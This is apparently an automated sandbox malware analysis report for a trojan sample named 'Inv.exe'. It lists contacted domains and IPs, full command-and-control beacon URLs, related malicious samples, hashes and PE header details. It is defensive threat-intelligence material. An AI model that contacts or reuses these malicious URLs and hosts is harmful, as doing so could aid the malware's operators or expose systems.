          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/40%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          parkingpage.namecheap.com
          		198.54.117.217
          		truefalse
            		high
            www.hwcailing.com
            		107.160.136.152
            		truefalseunknown
            millcityloam.com
            		34.102.136.180
            		truetrueunknown
            www.achonabu.com
            		172.96.186.206
            		truetrue
              		unknown
              nationshiphop.com
              		34.102.136.180
              		truetrue
                		unknown
                www.zhaowulu.com
                		unknown
                		unknowntrue
                  		unknown
                  www.millcityloam.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.nationshiphop.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.a-zsolutionsllc.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.jacmkt.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09ptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJPtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFertrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.tiro.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.goodfont.co.krexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.carterandcone.comlexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.typography.netDexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://fontfabrik.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.%s.comPAexplorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		low
                                            http://www.fonts.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              198.54.117.217
                                              		unknownUnited States
                                              		22612NAMECHEAP-NETUSfalse
                                              34.102.136.180
                                              		unknownUnited States
                                              		15169GOOGLEUStrue
                                              172.96.186.206
                                              		unknownCanada
                                              		32475SINGLEHOP-LLCUStrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:339347
                                              Start date:13.01.2021
                                              Start time:21:24:36
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 42s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Inv.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@8/0@7/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 22.1% (good quality ratio 20%)
                                              • Quality average: 74.8%
                                              • Quality standard deviation: 31.6%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 51.104.139.180, 2.20.142.209, 2.20.142.210, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              198.54.117.217Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                              • www.accessible.legal/csv8/?L48t=PHE4QRv&2drp=oGqbtMoj9RGciudNjVD/q4yy78sx6VM5qF/SD9h0TKn9WKeLzKNy9kqnybDPdO7olw30aQ==
                                              SMA121920.exeGet hashmaliciousBrowse
                                              • www.teamchi.club/t4vo/?QFNH9f=Npnlt5ZtO906n53msd9G5pBOdHOEeXQyD/1EjRFLMV7cbHJomhnAcg5WDTj2pPTWeV1x&_6j0yv=ZJB82RWHd85
                                              hUWiJym6fy.exeGet hashmaliciousBrowse
                                              • www.nautilus.photos/e66m/?Wzr=/jbGnlKlCl+kfGg+6TwKlRO8yGA+aFIV4OcnMw7A2/lyvNgUFCY9EZaTm1ZM9SSqNcgp&vB=chrxU
                                              payment advise.exeGet hashmaliciousBrowse
                                              • www.yelllouder2020.com/rbe/?8pV=_TJP3HkXZXxT3Te&lJBxWNm=1iZ+MyHDHrdkdHDQKPkmKBD0S2oXKnwDfLFj/eZ8ktt80Yt5QRvlAompcTbZEm0zVppV
                                              3Y690n1UsS.exeGet hashmaliciousBrowse
                                              • www.madbaddie.com/csv8/?SR-D3jP=bmU6bhxvgrtQDLdFrXfZu84+YLpNz+FpUYa4sbpu+DXpESkC+J6KAuS4IHdfpiPBOP9d&J0GTk=3fPL-xo0rXp0UNn
                                              Purchase_Order_39563854854.xlsxGet hashmaliciousBrowse
                                              • www.accessible.legal/csv8/?AZ=oGqbtMoj9RGciudNjVD/q4yy78sx6VM5qF/SD9h0TKn9WKeLzKNy9kqnybDPdO7olw30aQ==&1bqtf=oL30w6o
                                              INVOICE3DDH.exeGet hashmaliciousBrowse
                                              • www.varonaoptical.com/o56q/?KX6x=+6KqlXCT/pA/oDqwzrRUswgKWTyt1bmDlyjOl0MkZgd+CYHeb4TWrlrLvaaa+4ROmFJRKyI0ug==&LlZ=blyxBdiX2XMl58
                                              7OKYiP6gHy.exeGet hashmaliciousBrowse
                                              • www.bitcoingreenbond.com/mz59/?DxlpdH=a+WRcNqxRzT0gmXdfVWqtdPWY/r9S9GJaTPpKhK8YBP9A9DbB5qVI1TbjlVOiPDO4tu2&k2Jxtb=fDHHbT_hY
                                              SHIPMENT DOCUMENT.xlsxGet hashmaliciousBrowse
                                              • www.coffeekickz.com/tlu/?Kpjp=Q4FOpxYoQgcQU+FXQZb3qqXy0uOplBKKnEYsQK632yejRcs/kiGhmlxqCAUUokqPZhIFhg==&ebc8=E2JdjN_822M
                                              4Dm4XBD0J5.exeGet hashmaliciousBrowse
                                              • www.homeprosrva.com/glt/?pPX=V631xVWOJYRoGTcZraZCtd7zZZc74cJSbjf7SBZJPBBhWOUaAf9dCgDkRdAAO2+FePB4&1b=jnKtRlNpV
                                              NA_GRAPH.EXEGet hashmaliciousBrowse
                                              • www.adwhitenc.com/t4vo/?lN64=bCoh3yI1mQArDOAcU1sHzv9xr72CvBgm/TKZTqU1aClar/AcK91wi5ywzQHnx30DiDQ5&8p=MTKP1hb
                                              SOA290114.exeGet hashmaliciousBrowse
                                              • www.adwhitenc.com/t4vo/?pRoHnPa=bCoh3yI1mQArDOAcU1sHzv9xr72CvBgm/TKZTqU1aClar/AcK91wi5ywzTr3tGo4l25o6LGAXQ==&uZWD=XPjPaXEPSFMX8Dl
                                              54nwZp1aPg.exeGet hashmaliciousBrowse
                                              • www.buildingmaterialbarginctr.com/d9s8/?ApDl4VD=1z/eRrqZB71kkmnGvJKmv6voY3cB1Da5ESSx+W74rlkt01GQcYdwrCByWvMjmIccoqEN/DEs2w==&Vnt4Z=-ZshAxd0ipuHR2L
                                              RFQ Specification BINIF0865.exeGet hashmaliciousBrowse
                                              • www.cbdsleepguide.com/aqu2/?1bm=IAFBMy4u2uZ0nndpx2l4EhGP6QYf4LjJuZMcxot2rXLO/SjcCDS631VYgPsGowI1/tVB&BR-4c6=YVMdGJH0
                                              WQA101320.exeGet hashmaliciousBrowse
                                              • www.adwhitenc.com/t4vo/?6lbLpdZ0=bCoh3yI1mQArDOAcU1sHzv9xr72CvBgm/TKZTqU1aClar/AcK91wi5ywzTrOy3I7rglv6LGHEg==&3f=ZlO83hE8VbM
                                              http://wfdzrnqwms.raquelyounglove.org/f10382%0AGet hashmaliciousBrowse
                                              • www.twittercounter.com/embed/coinsblog/ffffff/111111?from=@
                                              http://admleaders.orgGet hashmaliciousBrowse
                                              • www.twittercounter.com/embed/coinsblog/ffffff/111111?from=@
                                              https://frtydx.storage.googleapis.com/1#qs=r-aeikjadjdjikdgiaefgdcgiaehjgjbiaehkgdabababaedahcaccaehdacfbfafkjcgacbGet hashmaliciousBrowse
                                              • www.grindwet.com/qs=r-aeikjadjdjikdgiaefgdcgiaehjgjbiaehkgdabababaedahcaccaehdacfbfafkjcgacb
                                              RFQ No. DAIDO-2020 6675379.exeGet hashmaliciousBrowse
                                              • www.hypertactical.com/mw4n/?FZa0Xr1=h/WvrsbDKPULpHGa/j/ZXvKrfgmmBoIqwyd/vRIUYSPBzftYYlIraPSW83szn4WdzpHm&EvL=B6Axgz
                                              Medical supplies Order - FARAM.exeGet hashmaliciousBrowse
                                              • www.babyshowerstationery.com/a0u/?pN6pRT6=0m1jZNNWqyAlg0YXghbtigmmw7oQIsoxCq42PM7s/Dsa9K2goB1e87e9HXSFK6z7RB+r&BXIxG=ZRVhjzOpgH

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              www.achonabu.comInvoice.exeGet hashmaliciousBrowse
                                              • 172.96.186.206
                                              parkingpage.namecheap.comin.exeGet hashmaliciousBrowse
                                              • 198.54.117.212
                                              urgent specification request.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              inquiry10204168.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Project review_Pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              0XrD9TsGUr.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              RFQ 41680.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              bpW4Utvn8eAozb4.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              current productlist.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              inv.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              order.exeGet hashmaliciousBrowse
                                              • 198.54.117.218
                                              Rfq_Catalog.exeGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              SMA121920.exeGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              scan_118637_pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.217
                                              SecuriteInfo.com.Heur.16160.xlsGet hashmaliciousBrowse
                                              • 198.54.117.212

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              NAMECHEAP-NETUSQPR-1064.pdf.exeGet hashmaliciousBrowse
                                              • 162.213.253.37
                                              in.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              DHL-Address.xlsxGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              New FedEx paper work review.exeGet hashmaliciousBrowse
                                              • 198.54.122.60
                                              PO-000202112.exeGet hashmaliciousBrowse
                                              • 63.250.34.114
                                              urgent specification request.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                              • 198.54.117.210
                                              shipping-document.xlsxGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              Project review_Pdf.exeGet hashmaliciousBrowse
                                              • 198.54.117.215
                                              iVUeQOg6LO.exeGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              mscthef-Fichero-ES.msiGet hashmaliciousBrowse
                                              • 162.255.118.194
                                              SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              Purchase Order -263.exeGet hashmaliciousBrowse
                                              • 162.0.232.59
                                              Duty checklist and PTP letter.exeGet hashmaliciousBrowse
                                              • 162.255.119.136
                                              zz4osC4FRa.exeGet hashmaliciousBrowse
                                              • 162.0.238.245
                                              0XrD9TsGUr.exeGet hashmaliciousBrowse
                                              • 198.54.117.216
                                              DHL-document.xlsxGet hashmaliciousBrowse
                                              • 199.193.7.228
                                              RFQ 41680.xlsxGet hashmaliciousBrowse
                                              • 198.54.117.211
                                              Invoice.exeGet hashmaliciousBrowse
                                              • 162.213.255.55
                                              GOOGLEUS74852.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              orden pdf.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              J0OmHIagw8.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              zHgm9k7WYU.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              JAAkR51fQY.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              65BV6gbGFl.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              YvGnm93rap.exeGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              ACH WIRE PAYMENT ADVICE..xlsxGet hashmaliciousBrowse
                                              • 108.177.126.132
                                              VFe7Yb7gUV.exeGet hashmaliciousBrowse
                                              • 8.8.8.8
                                              cremocompany-Invoice_216083-xlsx.htmlGet hashmaliciousBrowse
                                              • 216.239.38.21
                                              Order_00009.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              13-01-21.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              PO85937758859777.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                              • 108.177.127.132
                                              Order_385647584.xlsxGet hashmaliciousBrowse
                                              • 34.102.136.180
                                              rB26M8hfIh.exeGet hashmaliciousBrowse
                                              • 8.8.8.8
                                              brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                              • 216.239.34.21
                                              WFLPGBTMZH.dllGet hashmaliciousBrowse
                                              • 108.177.126.132
                                              PO#218740.exeGet hashmaliciousBrowse
                                              • 34.98.99.30
                                              SINGLEHOP-LLCUShttp://mckeepropainting.com/.adv3738diukjuctdyakbd/dhava93vdia11876dkb/ag38vdua3848dk/sajvd9484auad/ajd847vauadja/101kah474sbbadad/wose/Paint20200921_2219.pdf.htmlGet hashmaliciousBrowse
                                              • 198.143.164.252
                                              #Ud83d#Udcde_8360.htmGet hashmaliciousBrowse
                                              • 107.6.141.50
                                              http://getfreshnews.com/nuoazaojrnvenpyxyseGet hashmaliciousBrowse
                                              • 184.154.108.232
                                              http://iaaoaot.angelx97.xyz/OCFAheVlOOWYzT2RoWDEvaFEGet hashmaliciousBrowse
                                              • 172.96.186.242
                                              Invoices.exeGet hashmaliciousBrowse
                                              • 107.6.134.138
                                              Request Quotation.exeGet hashmaliciousBrowse
                                              • 107.6.134.138
                                              F9FX9EoKDL.exeGet hashmaliciousBrowse
                                              • 198.20.125.69
                                              All Open.xlsxGet hashmaliciousBrowse
                                              • 198.20.125.69
                                              faithful.exeGet hashmaliciousBrowse
                                              • 173.236.29.82
                                              https://nelleinletapt.buzz/CD/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178
                                              https://morelifedrop.net/CD/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178
                                              https://soprapaludo.it/Get hashmaliciousBrowse
                                              • 198.143.164.252
                                              https://morelifedrop.net/CD/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178
                                              SOA.exeGet hashmaliciousBrowse
                                              • 107.6.134.138
                                              https://konkreto.com.mx/CD/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178
                                              Fax UG3J1ECZ.docGet hashmaliciousBrowse
                                              • 67.212.179.164
                                              Check.vbsGet hashmaliciousBrowse
                                              • 65.63.74.20
                                              http://securedoc.sn.am/lZjl9HYl2WqGet hashmaliciousBrowse
                                              • 65.60.61.61
                                              at3nJkOFqF.exeGet hashmaliciousBrowse
                                              • 198.20.125.69
                                              https://calzadosdiscovery.com/office365.htmGet hashmaliciousBrowse
                                              • 108.163.237.178

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              No created / dropped files found

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.638953617352006
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Inv.exe
                                              File size:333824
                                              MD5:a3aba7d40da6c8c86e4e8d035803f314
                                              SHA1:469b36f05939d6ec6457f1b72ba9f6c7a960be06
                                              SHA256:1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
                                              SHA512:2cfa59a865a8292b98fb3e8e6ae79a4613d773be87c927ba4cc8e0f034010c0e5ebd0b85a74ca02ef59d47335908bcc610a597bc9cbfbfaaf364d76f51fff2fc
                                              SSDEEP:6144:Sr1I5DbAQcHAORYANcRgOUdQMgV96O5cBTe3pGiO3nhpPgMWOwihgTSE:W1I5fAPHdTdzgV98TetO3hKMMQgT9
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L......_...

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4088a7
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5FFEE5F0 [Wed Jan 13 12:22:08 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:e7da020c2fad0c59a3d5e97971484548

                                              Entrypoint Preview

                                              Instruction
                                              call 00007FEC4CE0A261h
                                              jmp 00007FEC4CE02EC5h
                                              push 00000014h
                                              push 0041D838h
                                              call 00007FEC4CE03768h
                                              call 00007FEC4CE06616h
                                              movzx esi, ax
                                              push 00000002h
                                              call 00007FEC4CE0A1F4h
                                              pop ecx
                                              mov eax, 00005A4Dh
                                              cmp word ptr [00400000h], ax
                                              je 00007FEC4CE02EC6h
                                              xor ebx, ebx
                                              jmp 00007FEC4CE02EF5h
                                              mov eax, dword ptr [0040003Ch]
                                              cmp dword ptr [eax+00400000h], 00004550h
                                              jne 00007FEC4CE02EADh
                                              mov ecx, 0000010Bh
                                              cmp word ptr [eax+00400018h], cx
                                              jne 00007FEC4CE02E9Fh
                                              xor ebx, ebx
                                              cmp dword ptr [eax+00400074h], 0Eh
                                              jbe 00007FEC4CE02ECBh
                                              cmp dword ptr [eax+004000E8h], ebx
                                              setne bl
                                              mov dword ptr [ebp-1Ch], ebx
                                              call 00007FEC4CE07603h
                                              test eax, eax
                                              jne 00007FEC4CE02ECAh
                                              push 0000001Ch
                                              call 00007FEC4CE02F95h
                                              pop ecx
                                              call 00007FEC4CE07C6Ch
                                              test eax, eax
                                              jne 00007FEC4CE02ECAh
                                              push 00000010h
                                              call 00007FEC4CE02F84h
                                              pop ecx
                                              call 00007FEC4CE063A8h
                                              and dword ptr [ebp-04h], 00000000h
                                              call 00007FEC4CE04B43h
                                              call dword ptr [004180C8h]
                                              mov dword ptr [00424080h], eax
                                              call 00007FEC4CE0A252h
                                              mov dword ptr [00422284h], eax
                                              call 00007FEC4CE09E53h
                                              test eax, eax
                                              jns 00007FEC4CE02ECAh
                                              push 00000008h
                                              call 00007FEC4CE01A7Ah
                                              pop ecx
                                              call 00007FEC4CE0A06Fh

                                              Rich Headers

                                              Programming Language:
                                              • [LNK] VS2012 build 50727
                                              • [RES] VS2012 build 50727
                                              • [ C ] VS2012 build 50727

